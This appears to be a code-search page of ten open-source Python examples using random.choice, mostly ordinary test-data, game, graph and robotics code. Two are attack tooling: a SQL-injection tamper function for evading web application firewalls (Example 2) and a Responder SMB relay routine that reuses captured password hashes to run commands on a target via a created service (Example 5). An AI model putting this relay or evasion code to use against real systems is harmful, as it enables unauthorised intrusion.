random.choice

Here are the examples of the python api random.choice taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples 7

Example 1

Project: logtacts
Source File: populate_test_data.py
View license
    def handle(self, *args, **options):
        book = Book.objects.get(id=options['book'])
        user = BookOwner.objects.filter(book=book)[0].user
        tags = []
        if options['reset']:
            Contact.objects.filter(book=book).delete()
            Tag.objects.filter(book=book).delete()
        for n in range(10):
            tags.append(Tag.objects.create(
                book=book,
                tag=fake.word(),
                color=fake.safe_hex_color(),
            ))
        for n in range(40):
            tag1 = random.choice(tags)
            tag2 = random.choice(tags)
            contact = Contact.objects.create(
                book=book,
                name=fake.name(),
            )
            contact.tags.add(tag1, tag2)
            contact.save()

            ContactField.objects.create(
                contact=contact,
                kind=contact_settings.FIELD_TYPE_ADDRESS,
                label="Address",
                value=fake.address(),
            )
            ContactField.objects.create(
                contact=contact,
                kind=contact_settings.FIELD_TYPE_TEXT,
                label="Company",
                value=fake.company(),
            )
            ContactField.objects.create(
                contact=contact,
                kind=contact_settings.FIELD_TYPE_EMAIL,
                label="Email",
                value=fake.email(),
            )
            ContactField.objects.create(
                contact=contact,
                kind=contact_settings.FIELD_TYPE_TEXT,
                label="Job",
                value=fake.job(),
            )
            ContactField.objects.create(
                contact=contact,
                kind=contact_settings.FIELD_TYPE_PHONE,
                label="Phone",
                value=fake.phone_number(),
            )
            ContactField.objects.create(
                contact=contact,
                kind=contact_settings.FIELD_TYPE_URL,
                label="Website",
                value=fake.url(),
            )
            for n in range(5):
                log = LogEntry.objects.create(
                    contact=contact,
                    time=fake.date_time_this_year(
                        tzinfo=timezone.get_current_timezone(),
                    ),
                    kind=random.choice(LogEntry.KIND_CHOICES),
                    notes=fake.text(max_nb_chars=42),
                    link=fake.url(),
                    logged_by=user,
                )
                contact.update_last_contact_from_log(log)

Example 2

Project: raspberry_pwn
Source File: space2mssqlblank.py
View license
def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters

    Requirement:
        * Microsoft SQL Server

    Tested against:
        * Microsoft SQL Server 2000
        * Microsoft SQL Server 2005

    Notes:
        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Eid%0DFROM%07users'
    """

    # ASCII table:
    #   SOH     01      start of heading
    #   STX     02      start of text
    #   ETX     03      end of text
    #   EOT     04      end of transmission
    #   ENQ     05      enquiry
    #   ACK     06      acknowledge
    #   BEL     07      bell
    #   BS      08      backspace
    #   TAB     09      horizontal tab
    #   LF      0A      new line
    #   VT      0B      vertical TAB
    #   FF      0C      new page
    #   CR      0D      carriage return
    #   SO      0E      shift out
    #   SI      0F      shift in
    blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace, end = False, False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                end = True

            elif payload[i] == " " and not doublequote and not quote:
                if end:
                    retVal += random.choice(blanks[:-1])
                else:
                    retVal += random.choice(blanks)

                continue

            retVal += payload[i]

    return retVal

Example 3

Project: ngine
Source File: particles.py
View license
    def __init__(self, **args):
        pygame.sprite.Sprite.__init__(self, self.containers)
        
        self.vx = random.choice([0.2, 0.4, 0.6, 0.8, 1.0])*5
        self.vy = random.choice([0.2, 0.4, 0.6, 0.8, 1.0])*5
        self.ax = random.choice([0, 0.025, 0.05, 0.1])
        self.ay = random.choice([0, 0.025, 0.05, 0.1])
        self.angle=0
        self.duration=self.lifetime=255
        self.lifedec=8
        self.init_color=self.current_color=(255,255,255)
        self.end_color=(0,0,0)
        self.color_type='fixed'
        pos=(0,0)
        max_size=3
        
        if "max_vx" in args: 
            self.vx = random.choice([0.2, 0.4, 0.6, 0.8, 1.0])*args["max_vx"]
        if "max_vy" in args: 
            self.vy = random.choice([0.2, 0.4, 0.6, 0.8, 1.0])*args["max_vy"]
        if "vx" in args: 
            self.vx = args["vx"]
        if "vy" in args: 
            self.vy = args["vy"]
        if "ax" in args: 
            self.ax = args["ax"]
        if "ay" in args: 
            self.ay = args["ay"]
        if "angle" in args: 
            self.angle = args["angle"]
        if "pos" in args: 
            pos = args["pos"]
        if "max_size" in args: 
            max_size = args["max_size"]
        if "duration" in args: 
            self.duration=self.lifetime = args["duration"]
        if "lifedec" in args: 
            self.lifedec = args["lifedec"]
        if "init_color" in args: 
            self.init_color = self.current_color = args["init_color"]
        if "end_color" in args: 
            self.end_color = args["end_color"]
        if "color_type" in args: 
            self.color_type = args["color_type"]
        
        if "size" in args:
            size = args["size"]
        else: 
            size=random.randint(1, max_size)
        
        self.interp_time=self.lifetime/30
        if "interp_time" in args: 
            self.interp_time = self.lifetime/args["interp_time"]
        
        self.diffcolor=[]
        for i in range(3): 
            self.diffcolor.append((self.init_color[i]-self.end_color[i])/self.interp_time)
        
        self.image = pygame.Surface((size, size))
        self.image.fill(self.init_color)
        self.rect = self.image.get_rect(center = pos)
        self.x, self.y = self.rect.center
        w = self.rect.width / 2
        h = self.rect.height / 2
        self.radius = math.sqrt(pow(w, 2) + pow(h, 2))

Example 4

Project: qgisSpaceSyntaxToolkit
Source File: swap.py
View license
def connected_double_edge_swap(G, nswap=1, _window_threshold=3):
    """Attempts the specified number of double-edge swaps in the graph ``G``.

    A double-edge swap removes two randomly chosen edges ``(u, v)`` and ``(x,
    y)`` and creates the new edges ``(u, x)`` and ``(v, y)``::

     u--v            u  v
            becomes  |  |
     x--y            x  y

    If either ``(u, x)`` or ``(v, y)`` already exist, then no swap is performed
    so the actual number of swapped edges is always *at most* ``nswap``.

    Parameters
    ----------
    G : graph
       An undirected graph

    nswap : integer (optional, default=1)
       Number of double-edge swaps to perform

    _window_threshold : integer

       The window size below which connectedness of the graph will be checked
       after each swap.

       The "window" in this function is a dynamically updated integer that
       represents the number of swap attempts to make before checking if the
       graph remains connected. It is an optimization used to decrease the
       running time of the algorithm in exchange for increased complexity of
       implementation.

       If the window size is below this threshold, then the algorithm checks
       after each swap if the graph remains connected by checking if there is a
       path joining the two nodes whose edge was just removed. If the window
       size is above this threshold, then the algorithm performs do all the
       swaps in the window and only then check if the graph is still connected.

    Returns
    -------
    int
       The number of successful swaps

    Raises
    ------

    NetworkXError

       If the input graph is not connected, or if the graph has fewer than four
       nodes.

    Notes
    -----

    The initial graph ``G`` must be connected, and the resulting graph is
    connected. The graph ``G`` is modified in place.

    References
    ----------
    .. [1] C. Gkantsidis and M. Mihail and E. Zegura,
           The Markov chain simulation method for generating connected
           power law random graphs, 2003.
           http://citeseer.ist.psu.edu/gkantsidis03markov.html
    """
    if not nx.is_connected(G):
        raise nx.NetworkXError("Graph not connected")
    if len(G) < 4:
        raise nx.NetworkXError("Graph has less than four nodes.")
    n = 0
    swapcount = 0
    deg = G.degree()
    # Label key for nodes
    dk = list(deg.keys())
    cdf = nx.utils.cumulative_distribution(list(G.degree().values()))
    window = 1
    while n < nswap:
        wcount = 0
        swapped = []
        # If the window is small, we just check each time whether the graph is
        # connected by checking if the nodes that were just separated are still
        # connected.
        if window < _window_threshold:
            # This Boolean keeps track of whether there was a failure or not.
            fail = False
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(G.neighbors(u))
                y = random.choice(G.neighbors(x))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                # If G remains connected...
                if nx.has_path(G, u, v):
                    wcount += 1
                # Otherwise, undo the changes.
                else:
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                    fail = True
            # If one of the swaps failed, reduce the window size.
            if fail:
                window = int(math.ceil(window / 2))
            else:
                window += 1
        # If the window is large, then there is a good chance that a bunch of
        # swaps will work. It's quicker to do all those swaps first and then
        # check if the graph remains connected.
        else:
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(G.neighbors(u))
                y = random.choice(G.neighbors(x))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                wcount += 1
            # If the graph remains connected, increase the window size.
            if nx.is_connected(G):
                window += 1
            # Otherwise, undo the changes from the previous window and decrease
            # the window size.
            else:
                while swapped:
                    (u, v, x, y) = swapped.pop()
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                window = int(math.ceil(window / 2))
    return swapcount

Example 5

Project: Responder
Source File: SMBRelay.py
View license
def RunRelay(host, Command,Domain):
    Target = host
    CMD = Command
    print "Target is running: ", RunSmbFinger((host, 445))
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 445))
    h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
    n = SMBNego(Data = SMBNegoData())
    n.calculate()
    packet0 = str(h)+str(n)
    buffer0 = longueur(packet0)+packet0
    s.send(buffer0)
    data = s.recv(2048)
    Key = ParseAnswerKey(data,host)
    DomainMachineName = ParseDomain(data)
    if data[8:10] == "\x72\x00":
        try:
            a = SmbRogueSrv139(Key,Target,DomainMachineName)
            if a is not None:
                LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
                if Domain is None:
                    Domain = OriginalDomain
                if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
                    pass
                else:
                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
                    t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
        except:
            raise
            a = None
    if data[8:10] == "\x73\x6d":
        print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
        Logs.info(CLIENTIP+":"+Username)
    if data[8:10] == "\x73\x0d":
        print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
        Logs.info(CLIENTIP+":"+Username)
        ## NtCreateAndx
    if data[8:10] == "\x73\x00":
        print "[+] Authenticated, trying to PSexec on target !"
        head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBNTCreateData()
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## Fail Handling.
    if data[8:10] == "\xa2\x22":
        print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
        ## DCE/RPC Write.
    if data[8:10] == "\xa2\x00":
        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        x = SMBDCEData()
        x.calculate()
        f = data[42:44]
        t = SMBWriteData(FID=f,Data=x)
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## DCE/RPC Read.
        if data[8:10] == "\x2f\x00":
            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
            t = SMBReadData(FID=f)
            t.calculate()
            packet0 = str(head)+str(t)
            buffer1 = longueur(packet0)+packet0
            s.send(buffer1)
            data = s.recv(2048)
            ## DCE/RPC SVCCTLOpenManagerW.
            if data[8:10] == "\x2e\x00":
                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
                w.calculate()
                x = SMBDCEPacketData(Data=w)
                x.calculate()
                t = SMBWriteData(FID=f,Data=x)
                t.calculate()
                packet0 = str(head)+str(t)
                buffer1 = longueur(packet0)+packet0
                s.send(buffer1)
                data = s.recv(2048)
                ## DCE/RPC Read Answer.
                if data[8:10] == "\x2f\x00":
                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                    t = SMBReadData(FID=f)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
                    ## DCE/RPC SVCCTLCreateService.
                    if data[8:10] == "\x2e\x00":
                        if data[len(data)-4:] == "\x05\x00\x00\x00":
                            print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
                        print "[+] Creating service"
                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                        ContextHandler = data[88:108]
                        ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
                        ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
                        FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
                        w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
                        w.calculate()
                        x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
                        x.calculate()
                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                        t.calculate()
                        packet0 = str(head)+str(t)
                        buffer1 = longueur(packet0)+packet0
                        s.send(buffer1)
                        data = s.recv(2048)
                        ## DCE/RPC Read Answer.
                        if data[8:10] == "\x2f\x00":
                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                            t.calculate()
                            packet0 = str(head)+str(t)
                            buffer1 = longueur(packet0)+packet0
                            s.send(buffer1)
                            data = s.recv(2048)
                            ## DCE/RPC SVCCTLOpenService.
                            if data[8:10] == "\x2e\x00":
                                if data[len(data)-4:] == "\x05\x00\x00\x00":
                                    print "[+] Failed to create the service"

                                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
                                w.calculate()
                                x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
                                x.calculate()
                                t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                t.calculate()
                                packet0 = str(head)+str(t)
                                buffer1 = longueur(packet0)+packet0
                                s.send(buffer1)
                                data = s.recv(2048)
                                ## DCE/RPC Read Answer.
                                if data[8:10] == "\x2f\x00":
                                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                    t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                    t.calculate()
                                    packet0 = str(head)+str(t)
                                    buffer1 = longueur(packet0)+packet0
                                    s.send(buffer1)
                                    data = s.recv(2048)
                                    ## DCE/RPC SVCCTLStartService.
                                    if data[8:10] == "\x2e\x00":
                                        if data[len(data)-4:] == "\x05\x00\x00\x00":
                                            print "[+] Failed to open the service"
                                        ContextHandler = data[88:108]
                                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                        w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
                                        x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
                                        x.calculate()
                                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                        t.calculate()
                                        packet0 = str(head)+str(t)
                                        buffer1 = longueur(packet0)+packet0
                                        s.send(buffer1)
                                        data = s.recv(2048)
                                        ## DCE/RPC Read Answer.
                                        if data[8:10] == "\x2f\x00":
                                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                            t.calculate()
                                            packet0 = str(head)+str(t)
                                            buffer1 = longueur(packet0)+packet0
                                            s.send(buffer1)
                                            data = s.recv(2048)
                                            if data[8:10] == "\x2e\x00":
                                                print "[+] Command successful !"
                                                Logs.info('Command successful:')
                                                Logs.info(Target+","+Username+','+CMD)
                                                return True
                                            if data[8:10] != "\x2e\x00":
                                                return False

Example 6

Project: LTLMoP
Source File: RRTControllerHandler.py
View license
    def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False):
        """
        Generate a new node on the current tree matrix
        V         : the node matrix
        V_theta   : the orientation matrix
        E         : the tree matrix (or edge matrix)
        Other     : the matrix containing the velocity and angular velocity(omega) information
        regionPoly: the polygon of current region
        stuck     : count on the number of times failed to generate new node
        append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful)
        """


        if self.system_print == True:
            print "In control space generating path,stuck = " + str(stuck)

        connection_to_tree = False   # True when connection to the tree is successful

        if stuck > self.stuck_thres:
            # increase the range of omega since path cannot ge generated
            omega = random.choice(self.omega_range_escape)
        else:
            #!!!! CONTROL SPACE STEP 1 - generate random omega
            omega = random.choice(self.omega_range)


        #!!!! CONTROL SPACE STEP 2 - pick a random point on the tree
        if append_after_latest_node:
            tree_index = shape(V)[1]-1
        else:
            if random.choice([1,2]) == 1:
                tree_index = random.choice(array(V[0])[0])
            else:
                tree_index = shape(V)[1]-1


        xPrev     = V[1,tree_index]
        yPrev     = V[2,tree_index]
        thetaPrev = V_theta[tree_index]

        j = 1
        #!!!! CONTROL SPACE STEP 3 - Check path of the robot
        path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev))
        while j <= self.timeStep:
            xOrg      = xPrev
            yOrg      = yPrev
            xPrev     = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev))
            yPrev     = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev))
            thetaPrev = omega* 1 + thetaPrev
            path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev))

            j = j + 1

        thetaPrev = self.orientation_bound(thetaPrev)
        path_all = PolyUtils.convexHull(path_robot)
        in_bound = regionPoly.covers(path_all)
        """
        # plotting
        if plotting == True:
            self.plotPoly(path_all,'r',1)
        """

        stuck = stuck + 1

        if in_bound:
            robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev))
            # check how many nodes on the tree does the new node overlaps with
            nodes_overlap_count = 0
            for k in range(shape(V)[1]-1):
                robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k]))
                if robot_new_node.overlaps(robot_old_node):
                    if  abs(thetaPrev - V_theta[k]) <   self.max_angle_overlap:
                        nodes_overlap_count += 1


            if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500):
                if  stuck > self.stuck_thres+1:
                    append_after_latest_node  = False

                if (stuck > self.stuck_thres+500):
                    stuck = 0
                stuck = stuck - 20
                # plotting
                if self.plotting == True:
                    self.plotPoly(path_all,'b',1)

                if self.system_print == True:
                    print "node connected"

                V = hstack((V,vstack((shape(V)[1],xPrev,yPrev))))
                V_theta = hstack((V_theta,thetaPrev))
                E = hstack((E,vstack((tree_index ,shape(V)[1]-1))))
                Other = hstack((Other,vstack((self.velocity,omega))))
                ##################### E should add omega and velocity
                connection_to_tree = True
                append_after_latest_node  = True
            else:
                append_after_latest_node = False

                if self.system_print == True:
                    print "node not connected. check goal point"

        else:
            append_after_latest_node = False

        return  V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree

Example 7

Project: starcheat
Source File: items.py
View license
    def generate_gun(self, item):
        d = item[0]

        # seems to be a newish key
        if "directories" in d and len(d["directories"]) > 0:
            image_folder = d["directories"][0]
        else:
            image_folder = d["name"].replace(d["rarity"].lower(), "")
            image_folder = image_folder.replace("plasma", "")
            image_folder = "/items/guns/randomgenerated/" + image_folder + "/"

        butts = self.assets.images().filter_images(image_folder + "butt/")
        middles = self.assets.images().filter_images(image_folder + "middle/")
        barrels = self.assets.images().filter_images(image_folder + "barrel/")

        if len(butts) > 0:
            butt = random.choice(butts)[0]
            butt_width = self.assets.images().get_image(butt).size[0]
        else:
            butt = ""
            butt_width = 0.0

        if len(middles) > 0:
            middle = random.choice(middles)[0]
            middle_width = self.assets.images().get_image(middle).size[0]
        else:
            middle = ""
            middle_width = 0.0

        if len(barrels) > 0:
            barrel = random.choice(barrels)[0]
        else:
            barrel = ""

        gun = {
            "itemName": "generatedgun",
            "generated": True,
            "maxStack": 1,
            "tooltipKind": "gun",
            "level": 1.0,
            "levelScale": 1.0,
            "projectile": {"level": 1.0, "power": 1.0},
            "projectileCount": random.randint(1, 10),
            "projectileSeparation": random.uniform(0.0, 1.0),
            "drawables": [  # TODO: palettes, some inv icons offset wrong
                {"image": butt, "position": [-(float(butt_width)), 0.0]},
                {"image": middle, "position": [0.0, 0.0]},
                {"image": barrel, "position": [float(middle_width), 0.0]}
            ]
        }

        gun["inventoryIcon"] = gun["drawables"]

        # this is made up, dunno how it really figures it
        if "rateOfFire" in d and len(d["rateOfFire"]) == 2:
            gun["fireTime"] = random.uniform(d["rateOfFire"][0] / 5,
                                             d["rateOfFire"][1] / 5)

        if "multiplier" in d:
            gun["multiplier"] = d["multiplier"]
            gun["classMultiplier"] = d["multiplier"]

        if "handPosition" in d and len(d["handPosition"]) == 2:
            gun["handPosition"] = [-d["handPosition"][0],
                                   -d["handPosition"][1]]

        if ("muzzleFlashes" in d and len(d["muzzleFlashes"]) > 0 and
                "fireSound" in d and len(d["fireSound"]) > 0):
            gun["muzzleEffect"] = {
                "animation": random.choice(d["muzzleFlashes"]),
                "fireSound": [{"file": random.choice(d["fireSound"])}]
            }

        if ("projectileTypes" in d and len(d["projectileTypes"]) > 0):
            gun["projectileType"] = random.choice(d["projectileTypes"])

        if "weaponType" in d:
            gun["shortdescription"] = "Cheater's " + d["weaponType"]

        if "hands" in d and len(d["hands"]) > 0 and d["hands"][0] == 2:
            gun["twoHanded"] = True
        else:
            gun["twoHanded"] = False

        def copy_key(name):
            if name in d:
                gun[name] = d[name]

        copy_key("baseDps")
        copy_key("directories")
        copy_key("firePosition")  # TODO: not correct
        copy_key("fireSound")
        copy_key("hands")
        copy_key("inaccuracy")
        copy_key("muzzleFlashes")
        copy_key("name")
        copy_key("nameGenerator")
        copy_key("palette")
        copy_key("projectileTypes")
        copy_key("rarity")
        copy_key("rateOfFire")
        copy_key("recoilTime")
        copy_key("weaponType")

        return gun

Example 8

Project: starcheat
Source File: items.py
View license
    def generate_sword(self, item):
        d = item[0]

        if "rarity" in d:
            image_folder = d["name"].replace(d["rarity"].lower(), "")
        else:
            image_folder = d["name"]
        image_folder = re.sub("(uncommon|common|crappy|new)", "", image_folder)
        image_folder = "/items/swords/randomgenerated/" + image_folder

        handles = self.assets.images().filter_images(image_folder + "/handle/")
        blades = self.assets.images().filter_images(image_folder + "/blade/")

        if len(handles) > 0:
            handle = random.choice(handles)[0]
        else:
            handle = ""

        if len(blades) > 0:
            blade = random.choice(blades)[0]
        else:
            blade = ""

        sword = {
            "generated": True,
            "itemName": "generatedsword",
            "tooltipKind": "sword",
            "parrySound": "",
            "level": 1,
            # TODO: palette
            "drawables": [{"image": handle},
                          {"image": blade}]
        }

        sword["inventoryIcon"] = sword["drawables"]

        ps = "primaryStances"
        if ps in d:
            sword[ps] = d[ps]
            sword[ps]["projectile"] = {
                "level": 1.0,
                "power": 1.0
            }
            if ("projectileTypes" in d[ps] and
                    len(d[ps]["projectileTypes"]) > 0):
                sword[ps]["projectileType"] = random.choice(d[ps]["projectileTypes"])

        als = "altStances"
        if als in d:
            sword[als] = d[als]
            sword[als]["projectile"] = sword[ps]["projectile"]
            if ("projectileTypes" in d[als] and
                    len(d[als]["projectileTypes"] > 0)):
                sword[als]["projectileType"] = random.choice(d[als]["projectileTypes"])
        else:
            sword[als] = sword[ps]

        if "rateOfSwing" in d and len(d["rateOfSwing"]) == 2:
            sword["fireTime"] = random.uniform(d["rateOfSwing"][0],
                                               d["rateOfSwing"][1])

        if "rarity" in d:
            sword["rarity"] = d["rarity"]
        else:
            sword["rarity"] = "common"

        if "weaponType" in d:
            sword["shortdescription"] = "Cheater's " + d["weaponType"]

        if "soundEffect" in d and len(d["soundEffect"]) > 0:
            sword["soundEffect"] = {
                "fireSound": [{"file": random.choice(d["soundEffect"])}]
            }

        def copy_key(name):
            if name in d:
                sword[name] = d[name]

        copy_key("fireAfterWindup")
        copy_key("firePosition")
        copy_key("weaponType")

        return sword

Example 9

View license
def sample_params(n = None, semi_random_params_key = 'conv_layer_n'):
    if n is None:
        n = get_possibility_n()
    else:
        possibility_n = get_possibility_n()
        assert n <= possibility_n, "%d > %d" %(n, possibility_n)
        
    pool = set()
    samples = []
    i = 0

    sys.stderr.write('total: %d\n' %(get_possibility_n()))

    while i < n:
        # random hyper parameters        
        params = {}
        for key in CONSTS:
            if not CONSTS[key]['on']:
                if CONSTS[key].get('default'):
                    CONSTS[key]['values'] = [CONSTS[key].get('default')]
                            
            depends_on = CONSTS[key].get('depends_on')
            candidates = CONSTS[key].get('values', [])
            if candidates:
                value = random.choice(candidates)
            else:
                value = None

            if depends_on:                
                if '+' in depends_on: # extra times
                    name, extra_n_str = depends_on.split('+')
                    dup_times = params[name] + int(extra_n_str.strip())
                else:
                    dup_times = params[depends_on]

                if CONSTS[key].get('repeat'):
                    assert value is not None
                    params[key] = tuple([value]) * dup_times
                else:
                    if candidates:
                        params[key] = tuple([random.choice(candidates) for _ in xrange(dup_times)])
                    else:
                        params[key] = tuple(range(dup_times)) # fake values to be replaced
            else:
                if isinstance(value, bool): #it's bool, show or hide
                    if value:
                        params[key] = value
                else:
                    assert value is not None
                    params[key] = value
            
            # remedy step that changes the value at specific positions
            if CONSTS[key].has_key('values_at_position'):
                values = [random.choice(candidates) for candidates in CONSTS[key]['values_at_position'].values()]
                positions = CONSTS[key]['values_at_position'].keys()
                params[key] = modify_tuple(params[key], positions, values)

        for key in SEMI_RANDOM_PARAMS:
            if not (CONSTS.get(key) and CONSTS[key]['on']): #it's not used for sampling
                params[key] = SEMI_RANDOM_PARAMS[key][params[semi_random_params_key]]
            
        if tuple(params.values()) in pool:
            continue
        else:
            i += 1
            sys.stderr.write("i = %d: %r\n" %(i, params))
            pool.add(tuple(params.values()))
            samples.append(params)
            
    return samples

Example 10

Project: btb
Source File: import_test_data.py
View license
def load_test_data():
    data_file = os.path.join(settings.MEDIA_ROOT, "test", "test_data.yaml")
    uploader = User.objects.get(username='uploader')
    commenter = User.objects.create(username="commenter")
    with open(data_file) as fh:
        data = yaml.safe_load(fh)

    orgs = {}

    print "Setting site..."
    site = Site.objects.get_current()
    site.domain = data['site']['domain']
    site.name = data['site']['name']
    site.save()

    print "Adding admins..."
    for admin_data in data['admins']:
        user, created = User.objects.get_or_create(
                username=admin_data['username'],
                is_superuser=True,
                is_staff=True,
        )
        user.set_password(admin_data['password'])
        user.save()

    print "Adding orgs..."
    for org_data in data['orgs']:
        org, created = Organization.objects.get_or_create(
                name=org_data['name'],
                personal_contact=org_data['personal_contact'],
                slug=slugify(org_data['name']),
                public=org_data['public'],
                mailing_address=org_data['mailing_address'],
                about=org_data.get('about', ''),
                footer=org_data.get('footer', ''),
        )
        orgs[org_data['name']] = org
        for mod_data in org_data['moderators']:
            u, created = User.objects.get_or_create(
                    username=mod_data['username']
            )
            u.set_password(mod_data['password'])
            u.save()
            org.moderators.add(u)
            Group.objects.get(name='moderators').user_set.add(u)
    for org_data in data['orgs']:
        mail_handled_by = org_data.get('outgoing_mail_handled_by', None)
        if mail_handled_by:
